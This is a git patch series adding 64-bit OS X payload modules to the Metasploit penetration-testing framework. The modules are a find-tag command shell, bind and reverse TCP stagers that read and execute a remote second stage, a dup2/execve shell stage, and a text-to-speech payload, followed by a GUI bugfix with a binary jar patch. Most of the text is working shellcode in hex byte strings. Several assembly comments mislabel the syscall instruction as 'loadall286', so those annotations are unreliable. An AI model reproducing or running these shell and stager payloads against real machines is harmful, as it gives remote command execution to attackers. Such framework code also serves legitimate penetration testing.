From dccb8d235dd68759ba972933e8030c289fdf908e Mon Sep 17 00:00:00 2001
From: dcbz <nemo@felinemenace.org>
Date: Fri, 21 Sep 2012 15:39:35 -0500
Subject: [PATCH 01/17] Adding OSX 64-bit find-tag module.

---
 .../singles/osx/x64/shell_find_tag.rb         | 87 +++++++++++++++++++
 1 file changed, 87 insertions(+)
 create mode 100644 modules/payloads/singles/osx/x64/shell_find_tag.rb

diff --git a/modules/payloads/singles/osx/x64/shell_find_tag.rb b/modules/payloads/singles/osx/x64/shell_find_tag.rb
new file mode 100644
index 0000000000..28fef6216b
--- /dev/null
+++ b/modules/payloads/singles/osx/x64/shell_find_tag.rb
@@ -0,0 +1,87 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/find_tag'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Payload::Osx
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'OSX Command Shell, Find Tag Inline',
+			'Version'       => '$Revision$',
+			'Description'   => 'Spawn a shell on an established connection (proxy/nat safe)',
+			'Author'        => 'nemo <nemo[at]felinemenace.org>',
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'osx',
+			'Arch'          => ARCH_X86_64,
+			'Handler'       => Msf::Handler::FindTag,
+			'Session'       => Msf::Sessions::CommandShellUnix
+
+			))
+			# exec payload options
+			register_options(
+				[
+					OptString.new('CMD',  [ true,  "The command string to execute", "/bin/sh" ]),
+					OptString.new('TAG',  [ true,  "The tag to test for", "NEMO" ]),
+			], self.class)
+	end
+
+	#
+	# ensures the setting of tag to a four byte value
+	#
+	def generate
+                cmd  = (datastore['CMD'] || '') << "\x00"
+                call = "\xe8" + [cmd.length].pack('V')
+		payload = 
+			 "\x48\x31\xFF" +                    # xor rdi,rdi
+			 "\x57" +                            # push rdi
+			 "\x48\x89\xE6" +                    # mov rsi,rsp
+			 "\x6A\x04" +                        # push byte +0x4
+			 "\x5A" +                            # pop rdx
+			 "\x48\x8D\x4A\xFE" +                # lea rcx,[rdx-0x2]
+			 "\x4D\x31\xC0" +                    # xor r8,r8
+			 "\x4D\x31\xC9" +                    # xor r9,r9
+			 "\x48\xFF\xCF" +                    # dec rdi
+			 "\x48\xFF\xC7" +                    # inc rdi
+			 "\xB8\x1D\x00\x00\x02" +            # mov eax,0x200001d
+			 "\x0F\x05" +                        # loadall286
+			 "\x81\x3C\x24" +                    # cmp dword [rsp],0x4e454d4f
+			 datastore['TAG'] + 
+			 "\x75\xED" +                        # jnz 0x17
+			 "\x48\x31\xC9" +                    # xor rcx,rcx
+			 "\xB8\x1D\x00\x00\x02" +            # mov eax,0x200001d
+			 "\x0F\x05" +                        # loadall286
+			 "\xB8\x5A\x00\x00\x02" +            # mov eax,0x200005a
+			 "\x48\x31\xF6" +                    # xor rsi,rsi
+			 "\x0F\x05" +                        # loadall286
+			 "\xB8\x5A\x00\x00\x02" +            # mov eax,0x200005a
+			 "\x48\xFF\xC6" +                    # inc rsi
+			 "\x0F\x05" +                        # loadall286
+			 "\x48\x31\xC0" +                    # xor rax,rax
+			 "\xB8\x3B\x00\x00\x02" +            # mov eax,0x200003b
+			 call +
+			 cmd +
+			 "\x48\x8B\x3C\x24" +                # mov rdi,[rsp]
+			 "\x48\x31\xD2" +                    # xor rdx,rdx
+			 "\x52" +                            # push rdx
+			 "\x57" +                            # push rdi
+			 "\x48\x89\xE6" +                    # mov rsi,rsp
+			 "\x0F\x05"                          # loadall286
+	end
+
+end

From 81ceff73703db31faf7c04dc5d7184052aac8fb2 Mon Sep 17 00:00:00 2001
From: dcbz <nemo@felinemenace.org>
Date: Sat, 22 Sep 2012 07:24:51 -0500
Subject: [PATCH 02/17] Added a tcp stager, and a small exec for testing

---
 modules/payloads/stagers/osx/x64/bind_tcp.rb  | 113 ++++++++++++++++++
 .../payloads/stages/osx/x64/dupandexecve.rb   |  42 +++++++
 2 files changed, 155 insertions(+)
 create mode 100644 modules/payloads/stagers/osx/x64/bind_tcp.rb
 create mode 100644 modules/payloads/stages/osx/x64/dupandexecve.rb

diff --git a/modules/payloads/stagers/osx/x64/bind_tcp.rb b/modules/payloads/stagers/osx/x64/bind_tcp.rb
new file mode 100644
index 0000000000..4202c42ed7
--- /dev/null
+++ b/modules/payloads/stagers/osx/x64/bind_tcp.rb
@@ -0,0 +1,113 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+
+###
+#
+# BindTcp
+# -------
+#
+# Mac OS X x86 bind TCP stager.
+#
+###
+module Metasploit3
+
+	include Msf::Payload::Stager
+
+	def initialize(info = { })
+		super(merge_info(info,
+			'Name'		=> 'Bind TCP Stager',
+			'Version'	=> '$Revision$',
+			'Description'	=> 'Listen, read length, read buffer, execute',
+			'Author'	=> 'nemo',
+			'License'	=> MSF_LICENSE,
+			'Platform'	=> 'osx',
+			'Arch'		=> ARCH_X86_64,
+			'Handler'	=> Msf::Handler::BindTcp,
+			'Convention'	=> 'sockedi',
+			'Stager'	=>
+			{
+				'Offsets' => { 'LPORT' => [ 31, 'n'] },
+				'Payload' =>
+					 "\xB8\x61\x00\x00\x02" +     # mov eax,0x2000061
+					 "\x6A\x02" +                 # push byte +0x2
+					 "\x5F" +                     # pop rdi
+					 "\x6A\x01" +                 # push byte +0x1
+					 "\x5E" +                     # pop rsi
+					 "\x48\x31\xD2" +             # xor rdx,rdx
+					 "\x0F\x05" +                 # loadall286
+					 "\x48\x89\xC7" +             # mov rdi,rax
+					 "\xB8\x68\x00\x00\x02" +     # mov eax,0x2000068
+					 "\x48\x31\xF6" +             # xor rsi,rsi
+					 "\x56" +                     # push rsi
+					 "\xBE\x00\x02\x15\xB3" +     # mov esi,0xb3150200
+					 "\x56" +                     # push rsi
+					 "\x48\x89\xE6" +             # mov rsi,rsp
+					 "\x6A\x10" +                 # push byte +0x10
+					 "\x5A" +                     # pop rdx
+					 "\x0F\x05" +                 # loadall286
+					 "\xB8\x6A\x00\x00\x02" +     # mov eax,0x200006a
+					 "\x48\x31\xF6" +             # xor rsi,rsi
+					 "\x48\xFF\xC6" +             # inc rsi
+					 "\x49\x89\xFC" +             # mov r12,rdi
+					 "\x0F\x05" +                 # loadall286
+					 "\xB8\x1E\x00\x00\x02" +     # mov eax,0x200001e
+					 "\x4C\x89\xE7" +             # mov rdi,r12
+					 "\x48\x89\xE6" +             # mov rsi,rsp
+					 "\x48\x89\xE2" +             # mov rdx,rsp
+					 "\x48\x83\xEA\x04" +         # sub rdx,byte +0x4
+					 "\x0F\x05" +                 # loadall286
+					 "\x49\x89\xC5" +             # mov r13,rax
+					 "\x48\x89\xC7" +             # mov rdi,rax
+					 "\xB8\x1D\x00\x00\x02" +     # mov eax,0x200001d
+					 "\x48\x31\xC9" +             # xor rcx,rcx
+					 "\x51" +                     # push rcx
+					 "\x48\x89\xE6" +             # mov rsi,rsp
+					 "\xBA\x04\x00\x00\x00" +     # mov edx,0x4
+					 "\x4D\x31\xC0" +             # xor r8,r8
+					 "\x4D\x31\xD2" +             # xor r10,r10
+					 "\x0F\x05" +                 # loadall286
+					 "\x41\x5B" +                 # pop r11
+					 "\x4C\x89\xDE" +             # mov rsi,r11
+					 "\x81\xE6\x00\xF0\xFF\xFF" + # and esi,0xfffff000
+					 "\x81\xC6\x00\x10\x00\x00" + # add esi,0x1000
+					 "\xB8\xC5\x00\x00\x02" +     # mov eax,0x20000c5
+					 "\x48\x31\xFF" +             # xor rdi,rdi
+					 "\x48\xFF\xCF" +             # dec rdi
+					 "\xBA\x07\x00\x00\x00" +     # mov edx,0x7
+					 "\x41\xBA\x02\x10\x00\x00" + # mov r10d,0x1002
+					 "\x49\x89\xF8" +             # mov r8,rdi
+					 "\x4D\x31\xC9" +             # xor r9,r9
+					 "\x0F\x05" +                 # loadall286
+					 "\x48\x89\xC6" +             # mov rsi,rax
+					 "\x56" +                     # push rsi
+					 "\x4C\x89\xEF" +             # mov rdi,r13
+					 "\x48\x31\xC9" +             # xor rcx,rcx
+					 "\x4C\x89\xDA" + 	      # mov rdx,r11
+					 "\x4D\x31\xC0" +             # xor r8,r8
+					 "\x4D\x31\xD2" +             # xor r10,r10
+					 "\xB8\x1D\x00\x00\x02" +     # mov eax,0x200001d
+					 "\x0F\x05" +                 # loadall286
+					 "\x58" +                     # pop rax
+					 "\xFF\xD0"                   # call rax
+			}
+		))
+	end
+
+	def handle_intermediate_stage(conn, p)
+		#
+		# Our stager payload expects to see a next-stage length first.
+		#
+		conn.put([p.length].pack('V'))
+	end
+end
diff --git a/modules/payloads/stages/osx/x64/dupandexecve.rb b/modules/payloads/stages/osx/x64/dupandexecve.rb
new file mode 100644
index 0000000000..afe727791d
--- /dev/null
+++ b/modules/payloads/stages/osx/x64/dupandexecve.rb
@@ -0,0 +1,42 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'OS X dup2 Command Shell',
+			'Version'       => '$Revision$',
+			'Description'   => 'dup2 socket in edi, then execve',
+			'Author'        => 'nemo',
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'osx',
+			'Arch'          => ARCH_X86_64,
+			'Session'       => Msf::Sessions::CommandShell,
+			'Stage'         =>
+				{
+					'Payload' =>
+						"\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"+ 
+						"\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb8"+ 
+						"\x3b\x00\x00\x02\xe8\x08\x00\x00\x00\x2f\x62\x69"+ 
+						"\x6e\x2f\x73\x68\x00\x48\x8b\x3c\x24\x48\x31\xd2"+ 
+						"\x52\x57\x48\x89\xe6\x0f\x05" 
+				}
+			))
+	end
+
+end

From 09b8a6d87fbdc60f95e370f234ecaa78d5293ef8 Mon Sep 17 00:00:00 2001
From: dcbz <nemo@felinemenace.org>
Date: Sat, 22 Sep 2012 08:31:42 -0500
Subject: [PATCH 03/17] Added reverse_tcp stager payload, and updated bind

---
 modules/payloads/stagers/osx/x64/bind_tcp.rb  |  2 +-
 .../payloads/stagers/osx/x64/reverse_tcp.rb   | 69 +++++++++++++++++++
 2 files changed, 70 insertions(+), 1 deletion(-)
 create mode 100644 modules/payloads/stagers/osx/x64/reverse_tcp.rb

diff --git a/modules/payloads/stagers/osx/x64/bind_tcp.rb b/modules/payloads/stagers/osx/x64/bind_tcp.rb
index 4202c42ed7..4390b1b41c 100644
--- a/modules/payloads/stagers/osx/x64/bind_tcp.rb
+++ b/modules/payloads/stagers/osx/x64/bind_tcp.rb
@@ -29,7 +29,7 @@ module Metasploit3
 			'Name'		=> 'Bind TCP Stager',
 			'Version'	=> '$Revision$',
 			'Description'	=> 'Listen, read length, read buffer, execute',
-			'Author'	=> 'nemo',
+			'Author'	=> 'nemo <nemo[at]felinemenace.org>',
 			'License'	=> MSF_LICENSE,
 			'Platform'	=> 'osx',
 			'Arch'		=> ARCH_X86_64,
diff --git a/modules/payloads/stagers/osx/x64/reverse_tcp.rb b/modules/payloads/stagers/osx/x64/reverse_tcp.rb
new file mode 100644
index 0000000000..02585e916e
--- /dev/null
+++ b/modules/payloads/stagers/osx/x64/reverse_tcp.rb
@@ -0,0 +1,69 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+
+###
+#
+# ReverseTcp
+# -------
+#
+# Mac OS X x86 Reverse TCP stager.
+#
+###
+module Metasploit3
+
+	include Msf::Payload::Stager
+
+	def initialize(info = { })
+		super(merge_info(info,
+			'Name'		=> 'Reverse TCP Stager',
+			'Version'	=> '$Revision$',
+			'Description'	=> 'Connect, read length, read buffer, execute',
+			'Author'	=> 'nemo <nemo[at]felinemenace.org>',
+			'License'	=> MSF_LICENSE,
+			'Platform'	=> 'osx',
+			'Arch'		=> ARCH_X86_64,
+			'Handler'	=> Msf::Handler::ReverseTcp,
+			'Convention'	=> 'sockedi',
+			'Stager'        =>
+			{
+				'Offsets' =>
+				{
+					'LHOST' => [ 37, 'ADDR'],
+					'LPORT' => [ 35, 'n']
+				},
+				'Payload' =>
+					"\xb8\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48" + 
+					"\x31\xd2\x0f\x05\x49\x89\xc5\x48\x89\xc7\xb8\x62" + 
+					"\x00\x00\x02\x48\x31\xf6\x56\x48\xbe\x00\x02\x15" + 
+					"\xb3\x7f\x00\x00\x01\x56\x48\x89\xe6\x6a\x10\x5a" + 
+					"\x0f\x05\x4c\x89\xef\xb8\x1d\x00\x00\x02\x48\x31" + 
+					"\xc9\x51\x48\x89\xe6\xba\x04\x00\x00\x00\x4d\x31" + 
+					"\xc0\x4d\x31\xd2\x0f\x05\x41\x5b\x4c\x89\xde\x81" + 
+					"\xe6\x00\xf0\xff\xff\x81\xc6\x00\x10\x00\x00\xb8" + 
+					"\xc5\x00\x00\x02\x48\x31\xff\x48\xff\xcf\xba\x07" + 
+					"\x00\x00\x00\x41\xba\x02\x10\x00\x00\x49\x89\xf8" + 
+					"\x4d\x31\xc9\x0f\x05\x48\x89\xc6\x56\x4c\x89\xef" + 
+					"\x48\x31\xc9\x4c\x89\xda\x4d\x31\xc0\x4d\x31\xd2" + 
+					"\xb8\x1d\x00\x00\x02\x0f\x05\x58\xff\xd0" 
+			}
+		))
+	end
+
+	def handle_intermediate_stage(conn, p)
+		#
+		# Our stager payload expects to see a next-stage length first.
+		#
+		conn.put([p.length].pack('V'))
+	end
+end

From 202a78dd3f58856c959682170774641a935547b7 Mon Sep 17 00:00:00 2001
From: dcbz <nemo@felinemenace.org>
Date: Sat, 22 Sep 2012 09:13:29 -0500
Subject: [PATCH 04/17] Added say.rb: uses /usr/bin/say to output a string

---
 modules/payloads/singles/osx/x64/say.rb | 56 +++++++++++++++++++++++++
 1 file changed, 56 insertions(+)
 create mode 100644 modules/payloads/singles/osx/x64/say.rb

diff --git a/modules/payloads/singles/osx/x64/say.rb b/modules/payloads/singles/osx/x64/say.rb
new file mode 100644
index 0000000000..476097996b
--- /dev/null
+++ b/modules/payloads/singles/osx/x64/say.rb
@@ -0,0 +1,56 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+
+require 'msf/core'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'OSX X64 say Shellcode',
+			'Version'       => '$Revision$',
+			'Description'   => 'Say an arbitrary string outloud using Mac OS X text2speech',
+			'Author'        => 'nemo <nemo[at]felinemenace.org>',
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'osx',
+			'Arch'          => ARCH_X86_64
+		))
+
+		# exec payload options
+		register_options(
+			[
+				OptString.new('SAY',  [ true,  "The string to say", "owned by nemo"]),
+		], self.class)
+	end
+
+	# build the shellcode payload dynamically based on the user-provided CMD
+	def generate
+		say = (datastore['SAY'] || '') << "\x00"
+		call = "\xe8" + [say.length + 0xd].pack('V') 
+		payload =
+			"\x48\x31\xC0" +                    # xor rax,rax
+			"\xB8\x3B\x00\x00\x02" +            # mov eax,0x200003b
+			call + 
+			"/usr/bin/say\x00" + 
+			say +
+			"\x48\x8B\x3C\x24" +                # mov rdi,[rsp] 
+			"\x4C\x8D\x57\x0D" +                # lea r10,[rdi+0xd]
+			"\x48\x31\xD2" +                    # xor rdx,rdx
+			"\x52" +                            # push rdx
+			"\x41\x52" +                        # push r10
+			"\x57" +                            # push rdi
+			"\x48\x89\xE6" +                    # mov rsi,rsp
+			"\x0F\x05"                          # loadall286
+	end
+end

From 10e1574d8a4ea7ad211cd9590a0ed0288488077d Mon Sep 17 00:00:00 2001
From: scriptjunkie <scriptjunkie@scriptjunkie.us>
Date: Sat, 22 Sep 2012 16:16:54 -0500
Subject: [PATCH 05/17] Bugfix with dragging tabbed panes when right-clicked.

Also don't displaly annoying null pointer error when no connection.
---
 data/gui/msfgui.jar                           | Bin 797495 -> 799736 bytes
 .../src/msfgui/DraggableTabbedPane.java       |  14 ++++++++++++--
 .../msfguijava/src/msfgui/RpcConnection.java  |   3 ++-
 3 files changed, 14 insertions(+), 3 deletions(-)

diff --git a/data/gui/msfgui.jar b/data/gui/msfgui.jar
index 34e09347dc4590919fa35a6c6b4aa94ed59401a5..f86f69c44821b33cdbc2ab5daaba34f8f344287a 100755
GIT binary patch
delta 18034
zcmaKU2YgT0`~NwgbwA@K5;7z*B@#j+v5CDSW^1<gs2wv(i--=YMdae3R!FH<t>8mz
zwp!KJs#>+FQLCY-(eQsi=X{b%zy19`Ugw^BpLL$+InQ~{xHsG<5+7er^lqPOwm2EH
zGqy9cMx#02vGyIPZ+w{8b56a%)@t#6t5n<gc?Hh%jN?4P5<R6xBSSNl#bcZ)0oQJ(
zTDWGL`tiKHN2a&Ts7Bcy_@jCw<h~cGZgGtXxHw)`7ZPPvw%UnGUew-uht1|dGh>0q
z$n>(J!D*LfB=m6v#W<Oj1vy!17VKnYSct|#H5R6^aHDc)b7N#eN#l=qLcNlbIdcvl
zkv?WXn-Sy0-TS<pSZA2adg&6@babDA0|)ds&W)>EDne%(v+FF9mDO03&Z1d4BWp~U
zQK4Uq5i!MT1byyp#19L1IQ#VLH(<<|=tN`v%;u$8BC|jb&TNb^C`mH#<S>>+24uiz
zfOA}HFc+@6ytkq*fhW#<m@m=dz9BQ=A6&eRnao?6c_Z#kjQE`rUJG(-OBn%*&Le|5
zr6el_DV+KJTUy5dDJ~h}>i&PlnVG*-A%F#<w!q7bc}sOTp6F*U9u<xEF6meqrcj9j
zdia<(jFY2Ei`l1LcH`~<N8YRtLb!<7Vs#jI-Ut>~?(@XFzh~U#Jk&Uv6Jkl^tc>A1
z#ZNTMvpI~|ndL?PbIoe3TN-X8FG(=|nBoQc^)nqNUfpOvGs-wSJDFE8W(})pw99J3
z-xB*DXyL}DtS8+jGAEzJTs(vM@hPkf&t#$eT~?F7$LjNGtQnuqI`9uz4?cqp=QG(@
zK8wB0XR`%7i{)^Gt>SapHa?GS=L^^lF4!)<knQCkvr~MrVaeWRr+CzIZI6uI1IqKH
zyc+|8x$x~|A7tDf7jKAxZN;Td_OizKjL^L3L7ekbM$F(&UcWLgeuf3{vry%nF@10=
zdn*i)`?oW$N-<TW7+yuJ+pi5Q6a?eW-;Df6(gi8$5+q%Qq$`m0o0LQfoy(okIJ-}*
zxTuE49bP3bq^}n@o(v5z8uS}1djAAZHe1}p$nSTV2a2$vJlwe7zp6Ee1@mAdZa`xm
zVhkV9N)EQbk1P8>MjStugDvq_47P@84#RiIB_m=)EhBE|VdL?LxzhFPc?F~X@NWJU
znVnaHV)3jrPk>^TStL&~)(-C}1wN>~EPEUTj*|kXKw#dZQ5{T1_OPnPzLCw0bz>up
z3ZtqR&&PV3gLtwrY*a_-<zAoOY>+oJ{VkKNY9fLo(&#Wc)Uc0#&$v0(&&U}+KoXUF
zuhrki(DYalaR!Rko!~HDj5;YgWbj(z;z#BvW5m#A#-0(i#ES22HH^x`dKQ<J!c&Z+
zx5AA>V?&IY<NbV7VMuEj(uR5Swk(jhGfJc@WqvzW^LN90LaZ2xcJk^@i08bfG32dZ
zc+I>9Z~Jrp3VJ8p7(20&wIeIVI~ku$Y~@Wov*!2hOLtfq+hH|ErALZAq~)`zjxMh`
zFjgx#F?8dcES6PtvPvwT?h@#(GF=j#EQwViSXH`Iqf2!s5=l+M)}l*odaOfIk};e$
zR?pazzMa=H>P%kNtG<o_+(1Wa@T0qiI%~ulYpjXRnzCj(YtCBetR>y0ux1)-rL$Dl
zT4!xoTb;FI?RD0Hy`r&Kb=Hw}(phIB>_V5WteeilkYkY<Ew!jyFlLRx86As;D}POt
z_{0+C?>%t9*ft~j4}N3tfYD=`jpxi<zCw!On4Ms?0Mpf|Ib{Hba>mTE#_lOz#^Nba
zYK$YPwltb$R=4`XEN0lICuekJLC7a6cRE=x3&j&BC2*zWv>yqHGH;)_&5Unj=0&V|
z#jVWZYhjZYvSb2oWmc*HwV`NRnY~`fVrJP$z>sas(S>d-+nBS<Hs-QyW%_F7i#yPI
zRopt5d2eMU;wrkCkIKrF3KJ-K^4FL@@6Iam9xRdfWJ$aitHXP<CcF=8#rv{0ydQg=
z4`99d8`6RZXjut*M_`JfT;IoI3*D7P&g3E|$KoFu0+bV``J%?Jc$Qt+C$ExmaB8gZ
zIg3DiHr1E&+M?lJTg|+t?;_#UHgc-?i;%BvQO2}4>*bYwKitFz8;z%DhYn={d>D)8
zX;5(lR2;?H^3kjlAH!bb>Bhb3J$)%&^KWLZ)Z#ITp+p!*M}>-BXI(ZUKiiR^IgnH%
z=~9+1QFMu>OF1Vln2cRKmLAK~rGk^k@roL+q;Z6`&JorwURmRb8c%XEAC9;#!4cPG
zIO5ueBd$yE8gxN$yEuZ|#Sz>-9Kr3wlQmw~nE@oYT)ZC1uTQKEh@l}}8quXOVVe*`
zQx|W>o71I*legq4glI*VRE@W`^EOTv$J^3#J3_aoyACe?3V)UEI?|;RT{_dH3thTm
zI(db6bMV*r>rURC_i(bhyr+xz;=RebJ{s@q<o$Sm0uQkBH%Og|1Q|$|L3DvL20K|(
zq8;L7&G}IB&@d7{T;pj}BMCI;{WU&<9!5IZR6dICz%bg$kkZl#KhDV(^C}vD(}})A
zJ>JQ>P(8uU-*U2UysgIHcCzk7+>K8p<Rm+vtZ^(w`tWo+pQ7<hC+knQQ#JmMlMUqQ
z8h_Wx2J`o*wf8kX&B=xlzl%@T_y<llLOx{h85;l4$wu>Zvb(ySe?(@@q{}Rg&vvr$
z=pQ^}krRf}Wez=N+ZtSyag3NQ!3}cPT#e7O^Z8_<?1h<hmrWNzmqB!a9~L;-48D*a
z7D1U7{9}zTcCuMy?Gh);qI#*FFLSbNzFgxuPBxDMB%4nsWKTO^LCvqEhfx~O<;*&=
zPuhSnVon9CU*6aA#@O^vurhpUEf-d_vP&`=E$%3%xZ1|y#epwR8jdC2#+s$kSd+N^
zH+va5?^icWOILfAC<m8%Tg=1y^cB84%t4~wcDolQ_n_)JTf&y=Y&H8-XP>ZDI?G`z
zbheBw*V!K|UuS=@$2$9*t<~8Y_L;_4>3lW+R9s3og&Uog`P<j<&vdqxxsB1wk`k}6
zD?0z2uhsb%e4WnM^9?%R$T#Uck1m@Dv4wBd**&^*^KIhjCpJH1{=MvLovmcKI^Ry1
zFZowG-@z{Ed?zmK8oRFZU3|C3_vm~t|61qY@O>KpR_EXG{W|}iAJEy)?3l>uY%Ogx
zU!Ib2jsKwYAE6lki8MIK4{7|c&X4e;M0i5yKl5Wc|AksP&hdDX?%d3+@l!fK&41PS
z8J(Zy=X8Faf2wilagpR);-7L>a!8+Xea2TF^XA~Rft6b|AKhp80F7VP`4#?~&abj7
zoK-QrbE>&6lKSiUHO>OWz15}wqhF4n&vp2Roh1uy@J*bB7?BG@jFmZ2_TS0un=GH^
zvCt}5p>w9Eq@@iQ-DFswF=GadffM*Gon7X)jf^G%M)-=JuBtk}!|zfXe;CtOROQu-
z9V?R1)pv1UgXFks5?8*?@A3QeY^$a7KluZ?b=21RL;i>}x!C22#-^2VHUHv|b^e4b
zC`C3_?(^o@$}L6@?%%r4gc0dub^eq;)A`?0QC^_)=lq3^Y2%7m_O`{}yUmz42Br_z
zO`PR>r1~VGd6P*unN1dG&aN1Jb6c6OnXIHhi6rb$nhZ!AJ76>{Fxf==L*|gY)42|N
ziNzS6c8pF$CGJe(hXgG=%1QBwM<)d#>XH<ZsDrUv`GT#3yVe_3zeq^k09XL_Ka91&
zoYoRsgcR&*T4KA<iqULIa~{Kty@}<aHesK(8Fw7pj{vp>cP7X~FiUxBzsSlUdCle2
z*AX<Guzcx^HoIW1?~3(LH&&Is#u~8Kv0CYl#Yzt>PkQ367iQ4jY$&ejsNZIN*(BCq
zwqGCnuW-!P+t_xr5zAuOm+ULF+7BA;U@M?qcg)5F<KPYnW;@v~pc%_xyV)Mp4jL;`
zz2oa1N%hoZJ{;<$0XqUFkHTJYG>d0rSRFPN>ZQZ@H=*=+2!9KTyv>HQiEJcfPQkxv
zER)S*Q`sE$F8i3h2Zy|mHm0#-Y&tu`K49nA4D{ZIQvEm30r8MP>RVWyz7YBiyk<pR
zhwa0i4eTN8Tc~P79;w2<!)l0n<Elq}y8E8x!T`EEAdT~8C#A(^G~Y@ZY=I#^upgzF
zYc~v)W>&$9i?O+I#ys@?eC#ggp(TMHUBKelLhO4Nv3ih@$`-R%ao-IAL_JO(uL?ht
zcS)1iJbh1hKe6R#!-T%1C@{f=ugWMeLt30i6V49W*deLP;*Dh+P(Y|H@FxhYRWAjV
zFFOo#=;zChpfNJhmmNjensAT&BxMwA40%b$ddS-Fk_=ao3>W*wBg4gxOE-~>6C@+A
z>!u!D`eZ7sXNVOI)_Fr;fA~EZomUPaQVBhigg$AB9(V(u9tn@W1)ol52U#`@T7;%n
zL%od<`z0Ft2F)Bq182}1SJ`Rg{$JT6JQW~cS=o8+%`Wg5c8Mn<2~}n1Gk86Am8Y^B
zQu}wA7sQ*vnuoD_x$urVST(pi7gm0W_@b!MAh^4S?hytQ1p{{I*ynh>hdYnuxKoxB
z_LLkP8gB;G@(_EW-n>3EJcB;<=QU+d+92pG!j*Etk<B&QQC9_{_ZgZrv3z*w9@f40
zG3N8Jy8ZJdx0fr*2T?`&Agm}KoM#uL%uZXDWN5xT%a>Q$%GzxNY#@6FgQX3mQ(LWQ
zhrs^EQvvRtBSH%hp)XhjA|Z}*R+*bwGPkgn@Ml}xcjPuKcO2O7yVyJM@B3V5)43P>
zn3s^cQRG&^N}M9sf_^K-F4ka|aLW+lg$Zm?k;3yl3RlMHrmSIxg2=j3_0?NrUL_U1
z0cG4D`^rG($HQbZ>Hx>z<9|DP@;3wk9pGTzC2nx6ftxk(Ux{<Gj&bHK*uUUnF(TYs
zZ1y<pR_w+Zcesp6nT~ig)U1g9sDvgHa6nLwg>hs%ULHG>3RsI(WsP|?>`1C(xnB=U
z!TMO^HDD8X3pRzfWFPVroPcy-%lIp7E$@mGkil#pf0O;h-@?hqQbgb~sd`JLRAJ~e
zg|#ZV#J~eL*zf3yL`2I?b_;g5LDIO5I}00zY<LHER%ErV>@MzXpu}Q_tj*iGt%@35
zlaZ+zUkzt{%1ZLja5(Wf3+HQDG+)OO_<B}@Z-6Bmu?pVA+VMQBayPS)d<)CK{_X=T
zCl+G!w}NkH>-m?k;48KVOPT{%(H!Nw*h#(z<7qFu&A(=UVmZV4KJMh-azDPGm*L-c
z=Mnrsk%{e)mhK^Ntr$VE2;A+sV?46ZY}`FixdL|&ac6?6njCFrIR8%!<6W@YL@PO5
z*Bd{4*<W^59L6Q%hq1Cgf@nC3EzB`=(JwIWIE*_1<4&<ueu1^;7mEUtL6^cj_bPj$
z+6C;XY?rXlaA(GLv?Yc@0oskhj6oV$F(l~Zj<Xj&b}Vr)B4lu3j8LisY7=u%ka9Vi
z)H!7ZA3HZ;tbkICisJ!NZx2f9<T=8`utM$yu@!>~HbP8$v_)gZ9#<wL)Xg*!tp@7L
z{Bep#@e?&Xr*gNQ+dVefF-XZK=$}z&0D8;i(Z3l`w5rh1kek`mrkq-PxgE9e(2Cm8
zirUdsJJ4On;8!lGjGCN6#{^bd=M*ZQLC^~SX}LGjhT=|!I<#hhLa$+zzRdp*yBhZY
zqY%{a;dBa2E-WsH6scCE$^T!{a>gO4B&U<$^<wWEX8%`S?$!S^zz>N@wfj;;nEopw
z0+7ByX?X1ljQzKxRY2I_Xsj2ZLuno)byyZ*_3!x-F;Kz0jHkhu{r!LVt5~2ROhQy@
zg_mZ^n81qD*tIJ#!|@f%?pD$;yV=~-xUbl}Zf-VzD-($At!zPD$%R|lBHUvRk<-Y>
z|3ph!%$%4gFeWP_X;#C6usWux8W_R#vAAl0WoW}9w?(li9*X>pz~D$yxJK}?s9$5;
zWhCrwPm3e^y>upiG%s()?psd0))@CgCRLAr`Mw0Iy}u<|P~E@bg=*8CWP0&YH{X}4
zwtvc}8IME_95ObveR5={*!V;%<xY<0MBr|d$dBQ*i9516A4bo!QurMc>WQsYJ)|9K
zVtu>o)(K){J09kq_zFKDL7OwKzOFz+I(a}HS9F>xI=s%qM8+kT=I+&%-y&(Luk!#i
zNtti;?yc}%mw}(z6L^AaDOFcVxO+(-exF#f`hx}a>Vdol%yOR}>JhQ<{euZa8Y<GR
zxa{tT5vmD&v<II)?Cy1i|C{h_(>+ZDx>r4raCeXK{7-74!`mK~=TjOcD%6LQ6)Gds
zgZilTq{~WLud6P*s5zSNa%a59<B9)^X&~}~_9f<DemE0dKhrL-8x0h9uEMsvGx!2K
